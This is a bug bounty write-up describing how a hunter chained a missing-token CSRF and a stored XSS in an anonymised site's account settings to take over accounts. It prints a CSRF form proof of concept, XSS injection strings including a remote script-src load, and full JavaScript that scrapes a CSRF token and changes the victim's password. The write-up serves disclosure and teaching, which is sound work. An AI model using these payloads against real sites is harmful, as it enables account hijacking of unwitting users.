This write-up is about my findings of CSRF + XSS and using them both to get a full account takeover. Hope you like it ❤
We always see write-ups / images like this showing CSRF vs. XSS, but have you ever thought of using them together?
Hi boyz, this is my first write-up, so excuse me if there are any mistakes or anything missing. My name is Fares Walid and I am a recent full-time bug bounty hunter, Python/Go coder, and interested in malware too xDD
This write-up is about my findings in a private program on HackerOne. I was able to find:
1. CSRF
2. XSS
3. XSS + CSRF = Account Takeover
I hate wasting time, so let's start by calling the affected site target.com.
At first I opened the website, registered a new user and tested some functions here and there. Then came one of the most important and lovely parts to test for me: the "Account Info/Settings" section.
First I started changing some details and inspecting the requests, and I noticed that there were no headers controlling anything, no CSRF tokens, no security at all!
Quickly I generated a CSRF PoC and tested it:
```html
<html><!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.target.com/?controller=account-service&action=update" method="POST">
<input type="hidden" name="first_name" value="sir" />
<input type="hidden" name="last_name" value="bugs" />
<input type="hidden" name="organization" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="address_line_1" value="" />
<input type="hidden" name="address_line_2" value="" />
<input type="hidden" name="city" value="mango" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="country" value="US" />
<input type="hidden" name="state_province" value="Other" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
Then I was able to get the **CSRF**!!
Next I tried changing the password, and I was really happy because it didn't ask for the current password at all!! It only requires the new password + confirm password and it's changed!
I tried to use my CSRF to change the password too!
But I faced something not so good here...
There was a CSRF token in the change-password request.
So I started testing the other inputs, trying to get an XSS!
Then I noticed something weird when I tried to put " ' ( ) < > and other chars in the inputs!!
But what was it? After I set the city to: **mango"'>**
I noticed the following!
I tried setting the city to: mango"><script>alert(document.cookie)</script>
That's so easy: no encoding, nothing protecting the requests, here we go.
Now I've got the XSS on top of the first CSRF!! What's next?
I wrote a quick JS file and uploaded it to my website, then used mango"><script src="my_js_file_url"></script> as the payload!!
What did the file contain?
```javascript
// The file is loaded via <script src="my_js_file_url">, so it holds plain JavaScript.
// Step 1: fetch the account page and read the change-password CSRF token out of it.
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/account-details', true);
req.send();

function handleResponse() {
  var token = this.responseText.match(/name="csrf-passwd" value="(\w+)"/)[1];
  // Step 2: only now, with the token in hand, submit the password change.
  var http = new XMLHttpRequest();
  http.open("POST", "/change-password", true);
  http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  http.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("content").innerHTML = this.responseText;
    }
  };
  http.send("password=123123&confirm_password=123123&csrf_token=" + token);
}
```
And boom, I'm fully in control of the account now.
Hope you liked this write-up; as soon as I find something interesting to write about, I'm going to share it :D
Have fun and keep digging ❤